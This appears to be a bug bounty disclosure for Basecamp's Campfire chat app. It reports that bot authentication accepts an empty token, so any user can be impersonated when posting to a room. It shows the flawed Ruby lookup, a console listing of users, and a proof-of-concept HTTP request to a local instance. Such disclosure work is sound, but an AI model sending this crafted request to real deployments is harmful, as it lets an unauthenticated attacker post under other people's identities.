Basecamp | 报告 #3329310 - 机器人认证不当导致在房间内发送消息时可冒充任何用户

1
2
3
4

def authenticate_bot(bot_key)
  bot_id, bot_token = bot_key.split("-")
  active.find_by(id: bot_id, bot_token: bot_token)
end

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

campfire(prod):038> User.active
=> 
[#<User:0x00007a444e940f18
  id: 1,
  name: "enoent",
  created_at: "2025-09-06 11:59:41.505220000 +0000",
  updated_at: "2025-09-06 14:08:08.788258000 +0000",
  role: "administrator",
  email_address: "[FILTERED]",
  password_digest: "[FILTERED]",
  active: true,
  bio: "<s>ddqsdqsds</s>",
  bot_token: nil>,
 #<User:0x00007a444e940dd8
  id: 2,
  name: "test",
  created_at: "2025-09-06 13:24:29.113250000 +0000",
  updated_at: "2025-09-06 13:42:26.539909000 +0000",
  role: "member",
  email_address: "[FILTERED]",
  password_digest: "[FILTERED]",
  active: true,
  bio: nil,
  bot_token: nil>,
 #<User:0x00007a444e940c98

1
2
3
4
5
6
7
8

POST /rooms/2/2-/messages HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: text/vnd.turbo-stream.html, text/html, application/xhtml+xml
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 193

Hello ! I'm the test user, even though I'm not authenticated